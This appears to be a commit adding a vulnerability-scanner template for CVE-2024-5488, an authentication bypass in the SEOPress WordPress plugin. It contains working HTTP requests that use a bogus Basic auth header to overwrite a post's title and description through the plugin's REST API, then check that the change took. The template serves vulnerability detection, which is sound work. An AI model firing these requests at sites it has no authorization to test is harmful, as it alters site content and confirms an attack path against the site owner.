Create CVE-2024-5488.yaml

patch-12
Dhiyaneshwaran 2024-10-03 03:45:48 +05:30 committed by GitHub
parent f3c5922904
commit d92ddd84f9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 68 additions and 0 deletions

View File

@ -0,0 +1,68 @@
id: CVE-2024-5488
info:
name: SEOPress < 7.9 - Authentication Bypass
author: pdresearch,iamnoooob,rootxharsh
severity: critical
description: |
The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
reference:
- https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
- https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5488
epss-score: 0.00043
epss-percentile: 0.09608
metadata:
verified: true
max-request: 3
tags: cve,cve2024,intrusive,wpscan,wp-plugin,seopress,auth-bypass
flow: http(1) && http(2) && http(3)
variables:
marker: "{{randstr}}"
username: "admin"
http:
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'Sorry, you are not allowed to do that.'
internal: true
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':aaaaaa')}}
Content-Type: application/x-www-form-urlencoded
title={{marker}}&description={{marker}}
matchers:
- type: word
part: body
words:
- '"code":"success"'
internal: true
- raw:
- |
GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"title":"{{marker}}","description":"{{marker}}"'